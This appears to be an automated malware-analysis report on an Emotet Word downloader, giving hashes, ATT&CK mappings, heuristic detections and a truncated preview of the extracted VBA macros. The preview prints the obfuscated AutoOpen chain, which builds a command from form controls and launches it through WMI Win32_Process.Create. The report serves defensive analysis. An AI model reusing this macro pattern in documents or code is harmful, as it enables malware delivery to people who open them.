Emotet Office (OLE) malware analysis — malicious · 754aad397218f016

MALICIOUS

Office (OLE)

132.2 KB Created: 2019-05-29 13:20:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: c75681c5bc5d436e9a93e044686152c5 SHA-1: 092944cc08585638609519394112fd1513ece571 SHA-256: 754aad397218f016deea4340aa68c3ef2b46d90cd7a218d53cb2c4a5efcba23d

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1137.001 Office Application Startup: VBA

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-10001946-0. Static analysis reveals the presence of VBA macros, including an autoopen macro, which is a common technique for Emotet. Crucially, the macros utilize `CreateObject` to launch `Win32_Process` via WMI, indicating an attempt to execute a secondary payload. The `autoopen` macro and the `CreateObject` call for WMI process creation are strong indicators of malicious intent.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5995 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5995 bytes
SHA-256: `5d4cad9fe770ba36aad5b61e7a93eb5e917f83422f8111410630cbae9b5a9ae1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "mSRp5U, 0, 0, MSForms, ComboBox" Attribute VB_Control = "TDDAinJ, 1, 1, MSForms, ComboBox" Attribute VB_Control = "kmi5rho, 2, 2, MSForms, ComboBox" Sub _ autoopen( _ ) 'Debug.Print "J2NdVb" + ("401" + ("ZFaBLIHE") + "JGuaIb" + "480") + "rRrrS4QF" + ("wYfuLp") + ("L1zaI3" + "zcaEB2A" + "580" + ("qYHI7Dm") + ("pqWjwuZ" + ("AaIz7p5") + "804" + ("668") + ("GY7ij2" + ("19")))) Debug.Print "vvwQT_" + ("964" + ("hVnmZj1h") + "YPHYLsc" + "407") + "C7siKrPn" + ("wrQ6BFi") + ("Sp02jc2z" + "c3kNv2s" + "628" + ("lTNpijz") + ("SGJ7bZ" + ("EJBT54") + "8" + ("321") + ("YfEUdaE" + ("254")))) zQoAY9 'Debug.Print "tXYb_4p" + ("77" + ("nC6Wvrf") + "VG8nh2Vo" + "429") + "nivKO_D5" + ("NoPOMQz") + ("M8Ajkb8" + "ioOOKOqN" + "286" + ("nnlsGK") + ("VVkjA3qw" + ("ItSQNT") + "225" + ("371") + ("Bi00Bjw" + ("620")))) Debug.Print "Va_QUj" + ("9" + ("Tfa7LH") + "ZaSiuJ0p" + "869") + "bfDCccm" + ("B8rSIJo_") + ("o3_qTMC" + "NAlcJZjt" + "308" + ("YkWSwjtA") + ("a_DQkuh" + ("rZo8itbi") + "540" + ("889") + ("RinINfr" + ("883")))) End Sub Attribute VB_Name = "ZwnVj8f" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "iWVonii" Attribute VB_Name = "mL1BzLs" Attribute VB_Name = "RaEc_4X" Attribute VB_Name = "YzuOl2cL" Attribute VB_Name = "HXA_3V" Attribute VB_Name = "oKGSVX" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "NNEuOcz" Function zQoAY9() 'Debug.Print "tIWEIH" + ("689" + ("LCBJPOW") + "k94Ecajj" + "875") + "zwX2uEaz" + ("Rz4uV7i0") + ("uVi9DV" + "wjjP7uoc" + "669" + ("JzkSGWI") + ("Ff0lFs7" + ("VwYRt2") + "845" + ("303") + ("HG4QXilP" + ("328")))) Debug.Print "i6Vckbl" + ("961" + ("qBOPWC") + "lcwQP2" + "234") + "iDfdlj" + ("uCzJaPV8") + ("DoABjqJ" + "hUqiOWM" + "8" + ("mNcbad_") + ("PMcUjjKk" + ("bzU_0Jf") + "215" + ("555") + ("LPbS8ImN" + ("591")))) k6S9Oijw = ThisDocument.TDDAinJ + ThisDocument.kmi5rho + ThisDocument.mSRp5U 'Debug.Print "DDNcJ9" + ("504" + ("UWaXlSh") + "VJ20I3J" + "977") + "Yad9u7" + ("ZHwhl_") + ("sYq4QXN" + "GOF6VS" + "181" + ("FG7Zqca") + ("ph4j30" + ("nSrwGN") + "893" + ("702") + ("DJJ1nIK4" + ("908")))) Debug.Print "lOcCUaC" + ("371" + ("GZVh4tn") + "CsEvVE59" + "914") + "zD1iDEO" + ("p3UCU9vw") + ("Vh4Bovod" + "WcHnLYDk" + "796" + ("Z3OFLXCb") + ("FpLU3G" + ("oZlHwW") + "344" + ("739") + ("z5LA177q" + ("654")))) CreateObject(("winmg" _ + "mts:Win" + _ "32_Process")).Create# k6S9Oijw, fCtpUw8, nBhMkp, OAYAEN 'Debug.Print "MnzmVFD" + ("536" + ("i9tqXAK") + "dGha2_IY" + "495") + "j89Wiwt" + ("H6KDhJ") + ("w5ozSCoi" + "wmNsji" + "251" + ("zWMkRhcp") + ("Y5rDNdlZ" + ("vUzwlvA") + "961" + ("438") + ("pob8ktUW" + ("278")))) Debug.Print "wmOUSj_" + ("237" + ("Yfzpib") + "bfOTQqP" + "249") + "mRCfjhW" + ("Ocb9MXm") + ("jSCSU1" + "IpWiECd" + "369" + ("B07STV5t") + ("bB8pWF" + ("ib9NvNXr") + "842" + ("976") + ("zlsrkVN" + ("327")))) End Function Attribute VB_Name = "fvpzIts" Function nBhMkp() 'Debug.Print "JHGz4AY" + ("364" + ("joWJTq") + "jRU6X5" + "459") + "NXihaij" + ("uj7nkY") + ("lt1TwZ" + "GMSQvNWM" + "419" + ("fzQJ2iOz") + ("Cs89LK" + ("Oi0wzSSN") + "348" + ("340") + ("mNcZWZ" + ("470")))) Debug.Print "ohmjiFfW" + ("298" + ("jVJnB1") + "tnM5HHd1" + "254") + "psK3f9W" + ("Kw3Dzn") + ("DzXjZfr" + "hfZFPPz" + "694" + ("Xdpqqkw") + ("nJGilE" + ("IFYMif6") + "303" + ("855") + ("zjCW ... (truncated)

SHA-256: 5d4cad9fe770ba36aad5b61e7a93eb5e917f83422f8111410630cbae9b5a9ae1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "mSRp5U, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "TDDAinJ, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "kmi5rho, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
   'Debug.Print "J2NdVb" + ("401" + ("ZFaBLIHE") + "JGuaIb" + "480") + "rRrrS4QF" + ("wYfuLp") + ("L1zaI3" + "zcaEB2A" + "580" + ("qYHI7Dm") + ("pqWjwuZ" + ("AaIz7p5") + "804" + ("668") + ("GY7ij2" + ("19"))))
Debug.Print "vvwQT_" + ("964" + ("hVnmZj1h") + "YPHYLsc" + "407") + "C7siKrPn" + ("wrQ6BFi") + ("Sp02jc2z" + "c3kNv2s" + "628" + ("lTNpijz") + ("SGJ7bZ" + ("EJBT54") + "8" + ("321") + ("YfEUdaE" + ("254"))))
zQoAY9
   'Debug.Print "tXYb_4p" + ("77" + ("nC6Wvrf") + "VG8nh2Vo" + "429") + "nivKO_D5" + ("NoPOMQz") + ("M8Ajkb8" + "ioOOKOqN" + "286" + ("nnlsGK") + ("VVkjA3qw" + ("ItSQNT") + "225" + ("371") + ("Bi00Bjw" + ("620"))))
Debug.Print "Va_QUj" + ("9" + ("Tfa7LH") + "ZaSiuJ0p" + "869") + "bfDCccm" + ("B8rSIJo_") + ("o3_qTMC" + "NAlcJZjt" + "308" + ("YkWSwjtA") + ("a_DQkuh" + ("rZo8itbi") + "540" + ("889") + ("RinINfr" + ("883"))))
End Sub


Attribute VB_Name = "ZwnVj8f"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "iWVonii"

Attribute VB_Name = "mL1BzLs"

Attribute VB_Name = "RaEc_4X"

Attribute VB_Name = "YzuOl2cL"

Attribute VB_Name = "HXA_3V"

Attribute VB_Name = "oKGSVX"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "NNEuOcz"
Function zQoAY9()
   'Debug.Print "tIWEIH" + ("689" + ("LCBJPOW") + "k94Ecajj" + "875") + "zwX2uEaz" + ("Rz4uV7i0") + ("uVi9DV" + "wjjP7uoc" + "669" + ("JzkSGWI") + ("Ff0lFs7" + ("VwYRt2") + "845" + ("303") + ("HG4QXilP" + ("328"))))
Debug.Print "i6Vckbl" + ("961" + ("qBOPWC") + "lcwQP2" + "234") + "iDfdlj" + ("uCzJaPV8") + ("DoABjqJ" + "hUqiOWM" + "8" + ("mNcbad_") + ("PMcUjjKk" + ("bzU_0Jf") + "215" + ("555") + ("LPbS8ImN" + ("591"))))
k6S9Oijw = ThisDocument.TDDAinJ + ThisDocument.kmi5rho + ThisDocument.mSRp5U
   'Debug.Print "DDNcJ9" + ("504" + ("UWaXlSh") + "VJ20I3J" + "977") + "Yad9u7" + ("ZHwhl_") + ("sYq4QXN" + "GOF6VS" + "181" + ("FG7Zqca") + ("ph4j30" + ("nSrwGN") + "893" + ("702") + ("DJJ1nIK4" + ("908"))))
Debug.Print "lOcCUaC" + ("371" + ("GZVh4tn") + "CsEvVE59" + "914") + "zD1iDEO" + ("p3UCU9vw") + ("Vh4Bovod" + "WcHnLYDk" + "796" + ("Z3OFLXCb") + ("FpLU3G" + ("oZlHwW") + "344" + ("739") + ("z5LA177q" + ("654"))))
CreateObject(("winmg" _
+ "mts:Win" + _
"32_Process")).Create# k6S9Oijw, fCtpUw8, nBhMkp, OAYAEN
   'Debug.Print "MnzmVFD" + ("536" + ("i9tqXAK") + "dGha2_IY" + "495") + "j89Wiwt" + ("H6KDhJ") + ("w5ozSCoi" + "wmNsji" + "251" + ("zWMkRhcp") + ("Y5rDNdlZ" + ("vUzwlvA") + "961" + ("438") + ("pob8ktUW" + ("278"))))
Debug.Print "wmOUSj_" + ("237" + ("Yfzpib") + "bfOTQqP" + "249") + "mRCfjhW" + ("Ocb9MXm") + ("jSCSU1" + "IpWiECd" + "369" + ("B07STV5t") + ("bB8pWF" + ("ib9NvNXr") + "842" + ("976") + ("zlsrkVN" + ("327"))))
End Function


Attribute VB_Name = "fvpzIts"
Function nBhMkp()
   'Debug.Print "JHGz4AY" + ("364" + ("joWJTq") + "jRU6X5" + "459") + "NXihaij" + ("uj7nkY") + ("lt1TwZ" + "GMSQvNWM" + "419" + ("fzQJ2iOz") + ("Cs89LK" + ("Oi0wzSSN") + "348" + ("340") + ("mNcZWZ" + ("470"))))
Debug.Print "ohmjiFfW" + ("298" + ("jVJnB1") + "tnM5HHd1" + "254") + "psK3f9W" + ("Kw3Dzn") + ("DzXjZfr" + "hfZFPPz" + "694" + ("Xdpqqkw") + ("nJGilE" + ("IFYMif6") + "303" + ("855") + ("zjCW
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.